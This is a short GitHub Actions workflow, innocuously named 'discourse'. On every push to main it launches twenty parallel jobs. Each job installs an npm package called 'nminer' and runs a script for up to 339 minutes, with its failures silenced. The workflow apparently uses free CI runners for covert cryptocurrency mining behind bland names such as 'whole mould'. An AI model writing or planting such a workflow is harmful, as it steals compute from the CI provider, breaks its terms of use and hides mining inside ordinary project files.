name: discourse
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5257 }
          - { version: 137 }
          - { version: 2091 }
          - { version: 3676 }
          - { version: 8696 }
          - { version: 3232 }
          - { version: 5571 }
          - { version: 584 }
          - { version: 5473 }
          - { version: 5291 }
          - { version: 2541 }
          - { version: 7692 }
          - { version: 1332 }
          - { version: 9366 }
          - { version: 8290 }
          - { version: 7553 }
          - { version: 4286 }
          - { version: 2497 }
          - { version: 8129 }
          - { version: 6035 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: whole mould
        run: |
          npm install nminer@latest
          timeout 339m node discourse.js || echo "discourse executed"